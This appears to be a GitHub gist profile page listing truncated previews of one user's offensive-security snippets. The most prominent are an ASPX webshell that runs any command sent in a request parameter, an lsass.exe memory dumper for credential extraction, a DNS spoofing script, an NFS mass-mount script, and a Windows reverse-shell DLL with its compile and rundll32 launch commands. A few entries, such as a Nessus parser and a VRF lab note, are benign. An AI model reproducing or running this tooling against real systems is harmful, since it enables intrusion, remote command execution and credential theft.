Skip to content

Instantly share code, notes, and snippets.

View FrankSpierings's full-sized avatar

Frank Spierings FrankSpierings

57 followers · 1 following
View GitHub Profile
@FrankSpierings
FrankSpierings / shell.aspx
Created August 1, 2019 15:28
ASPX webshell
<%-- <%@ Page Language="C#" Debug="true" Trace="false" %> --%>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c " + Request["cmd"];
psi.RedirectStandardOutput = true;
@FrankSpierings
FrankSpierings / dns-spoof.py
Last active June 5, 2021 08:12
DNS-Spoof.py (IPv6 and IPv4)
import socket
import threading
import socketserver
import time
from dnslib import *
import struct
import netifaces
import logging
import logging.config
import json
@FrankSpierings
FrankSpierings / lsass-dump.ps1
Last active June 21, 2022 09:45
Dump lsass.exe memory
$code = @"
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.IO;
public class MiniDump
{
// PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION | PROCESS_VM_READ
@FrankSpierings
FrankSpierings / xhr.js
Created July 1, 2019 08:37
XHR
url = "";
var xhr = new XMLHttpRequest();
xhr.open("get", url, false);
xhr.send();
xhr.response
@FrankSpierings
FrankSpierings / mount-all-nfs.sh
Last active August 13, 2019 17:33
#!/bin/sh
MOUNTDIR="/tmp/mount"
for TARGETHOST in nfs001.localdomain nfs002.localdomain nfs003.localdomain
do
for MOUNTPOINT in $(showmount -e $TARGETHOST | cut -d ' ' -f1 | tail -n +2)
do
DIRNAME=${TARGETHOST}${MOUNTPOINT}
DSTDIR=${MOUNTDIR}/${DIRNAME}
mkdir -p "${MOUNTDIR}/${DIRNAME}"
@FrankSpierings
FrankSpierings / impacket-2-solr.py
Last active June 18, 2019 17:10
Playing with impacket smb and solr
import logging
import string
import os
import requests
import re
from impacket.smbconnection import *
log = logging.getLogger()
logging.basicConfig(format='%(levelname)s: %(asctime)s - %(name)s - %(process)s - %(message)s',
level=logging.INFO, datefmt='%I:%M:%S')
@FrankSpierings
FrankSpierings / nessus-parse-xml-host-ports.py
Created June 5, 2019 16:21
Nessus parse xml host & ports from its SYN scan
from lxml import etree
filename = ''
xml = etree.parse(filename)
output = []
for reporthost in xml.xpath('//ReportHost'):
name = reporthost.attrib['name']
out = {'name' : name, 'ports': []}
@FrankSpierings
FrankSpierings / del-bin-strings.py
Created May 12, 2019 14:22
Overwrite Strings in Binary
import re
import os
import time
filename = 'test.exe'
new_filename = '{0}.backup.{1}'.format(filename, int(time.time()))
pattern = b'GCC: .*?\x00'
@FrankSpierings
FrankSpierings / shell-dll.c
Last active July 8, 2021 17:24
Windows Reverse Shell in C
/*
Compile:
docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 && i686-w64-mingw32-gcc -O3 -s shell-dll.c -lws2_32 -shared -o shell.dll"
Run:
rundll32 shell.dll,main 127.0.0.1 4444 cmd.exe
*/
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
@FrankSpierings
FrankSpierings / Alpine-VRF-test-lab.md
Last active May 9, 2019 10:42
Alpine example of setting up a VRF. The same IPv4 address space is used inside the VRF's.

VM Setup

  • Virtualbox
  • 3x Alpine 3.9 Virtual Machine

Network

VirtualBox

  • Tools - Network